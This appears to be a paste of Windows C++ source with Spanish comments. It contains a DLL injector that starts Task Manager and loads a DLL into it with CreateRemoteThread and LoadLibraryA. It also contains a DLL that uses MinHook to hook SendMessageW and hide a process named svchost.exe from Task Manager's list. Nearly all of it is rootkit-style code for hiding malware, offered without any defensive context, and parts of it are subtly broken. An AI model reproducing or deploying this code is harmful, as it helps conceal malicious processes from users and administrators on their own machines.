Inyector:
#include "stdafx.h"
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <Tlhelp32.h>
#include <wchar.h>
#include <iostream>
using namespace std;
void error(char *err);
HANDLE myProc = NULL;
void error(char *err)
{
if (myProc != NULL) CloseHandle(myProc);
printf("%s", err);
exit(0);
}
HANDLE Startpausedprocess( char* cmd, PHANDLE ptr_thread ) // cleaned up a bit, but no RAII
{
if( ptr_thread == nullptr ) return nullptr ;
PROCESS_INFORMATION pi;
STARTUPINFOA si {} ; // initialize with zeroes.
si.cb = sizeof(STARTUPINFOA);
if( !CreateProcessA( nullptr, cmd, nullptr, nullptr, false, CREATE_SUSPENDED,
nullptr, nullptr, std::addressof(si), std::addressof(pi) ) )
{
std::cerr << "CreateProcess failed, " << GetLastError() << '\n' ;
*ptr_thread = nullptr ;
return nullptr;
}
*ptr_thread = pi.hThread;
return pi.hProcess;
}
int main(int argc, char *argv[])
{
char cmd[] = "taskmgr.exe" ; // note: non-const (writeable array)
HANDLE thread = nullptr ;
auto myProc=Startpausedprocess( cmd, std::addressof(thread) ) ;
if(myProc)
{
std::cout << "press enter to resume process... " && std::cin.get() ;
ResumeThread(thread) ;
//CloseHandle(thread) ;
//CloseHandle(myProc) ;
}
// Reservar memoria para el argumento (ruta de la DLL)
char thData[] = "dllmain.dll";
LPVOID dirToArg = VirtualAllocEx(myProc, NULL, strlen(thData), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (dirToArg == NULL)
error("[-] Error reservando memoria para argumento.\n");
else
printf("[+] Memoria reservada para argumento (%i bytes).\n", strlen(thData));
// Escribir la ruta de la DLL en la memoria reservada
SIZE_T written = 0;
if (WriteProcessMemory(myProc, dirToArg, (LPVOID)&thData, strlen(thData), &written) == 0)
error("[-] Error escribiendo memoria.\n");
else
printf("[+] Memoria escrita (arg %i bytes).\n", written);
//Lanzar un hilo con LoadLibrary
//Load the DLL
//Load the DLL
HANDLE rThread = CreateRemoteThread(myProc, NULL, NULL, (LPTHREAD_START_ROUTINE)GetProcAddress(LoadLibrary(L"Kernel32.dll"), "LoadLibraryA"), dirToArg, NULL, NULL);
if (rThread == NULL)
error("[-] Error creando el hilo.\n");
else
printf("[+] Hilo creado.\n");
CloseHandle(rThread);
}using namespace std;
typedef void (*SENDMESSAGEW)();//Typedef for the hooked function
static SENDMESSAGEW Basewritefoobar;//Backup of the originak fonction
static const wchar_t *hiddenprocess=L"svchost.exe";//The name of the process we want to hide
LRESULT WINAPI BSSSendMessageW(HWND hwnd, UINT msg, WPARAM wparam, LPARAM lparam)
{
if ( msg == LVM_INSERTITEMW || msg == LVM_SETITEMW)//Intercepts LVM_INSERTITEM and LVM_SETITEM messages
{
if (!lstrcmpW(((LVITEMW*)lparam)->pszText, hiddenprocess))//The lparam is a LVITEM* struct.
{
return 0;//If the item name is the same as process we want to hide, we simply return 0 (and we do not call the real SendMessage function.
}
//return 0;
}
return SendMessage(hwnd, msg, wparam, lparam);//Calls the real SendMessage function.
}
static bool Hook();
template <typename T>
inline MH_STATUS MH_CreateHookEx(void* target, void* const base, T** original)
{
return MH_CreateHook(target, base, reinterpret_cast<void**>(original));
}
extern "C" __declspec (dllexport) void __cdecl SendWrite()
{
}
BOOL WINAPI DllMain(HINSTANCE hInst, ULONG ul_reason_for_call, LPVOID lpReserved)
{
//Different behaviors depending on the reason why DllMain is called
switch (ul_reason_for_call) {
case DLL_PROCESS_ATTACH:
if (!Hook())//Hook "Writefoobar"
{
cout << "Hook failed" << endl;
return 1;
}
break;
case DLL_PROCESS_DETACH:
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
}
return TRUE;
}
bool Hook()
{
if (MH_Initialize() != MH_OK)
{
return false;
}
if (MH_CreateHookEx((void*)&SendMessageW, (void*)&BSSSendMessageW, &Basewritefoobar) != MH_OK)
{
return FALSE;
}
return MH_EnableHook((void*)&SendMessageW) == MH_OK;
}
